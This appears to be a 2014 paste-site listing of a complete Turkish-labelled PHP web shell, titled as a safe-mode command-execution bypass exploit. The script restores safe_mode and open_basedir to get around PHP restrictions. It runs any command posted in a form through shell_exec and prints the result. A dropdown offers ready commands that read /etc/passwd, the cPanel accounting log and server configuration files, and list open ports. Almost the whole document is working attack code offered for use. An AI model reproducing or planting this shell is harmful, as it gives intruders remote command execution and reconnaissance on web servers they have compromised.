Liz0zim Bypass Shells - Shells-Center.Com


SUBMITTED BY: Guest

DATE: Sept. 6, 2014, 7:45 a.m.

FORMAT: PHP

SIZE: 1.5 kB

HITS: 505

  1. <?
  2. echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>";
  3. print_r('
  4. <pre>
  5. <form method="POST" action="">
  6. <b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="Çalýþtýr" type="submit">
  7. </form>
  8. <form method="POST" action="">
  9. <b><font color=blue>Hýzlý Menü :=) :</font><select size="1" name="liz0">
  10. <option value="cat /etc/passwd">/etc/passwd</option>
  11. <option value="netstat -an | grep -i listen">Tüm Açýk Portalarý Gör</option>
  12. <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
  13. <option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
  14. <option value="cat /etc/hosts">/etc/hosts</option>
  15. <option value="cat /etc/named.conf">/etc/named.conf</option>
  16. <option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
  17. </select> <input type="submit" value="Göster Bakim">
  18. </form>
  19. </pre>
  20. ');
  21. ini_restore("safe_mode");
  22. ini_restore("open_basedir");
  23. $liz0=shell_exec($_POST[baba]);
  24. $liz0zim=shell_exec($_POST[liz0]);
  25. $uid=shell_exec('id');
  26. $server=shell_exec('uname -a');
  27. echo "<pre><h4>";
  28. echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
  29. echo "<b><font color=red>Server</font></b>:$server<br>";
  30. echo "<b><font color=red>Komut Sonuçlarý:</font></b><br>";
  31. echo $liz0;
  32. echo $liz0zim;
  33. echo "</h4></pre>";
  34. ?>

comments powered by Disqus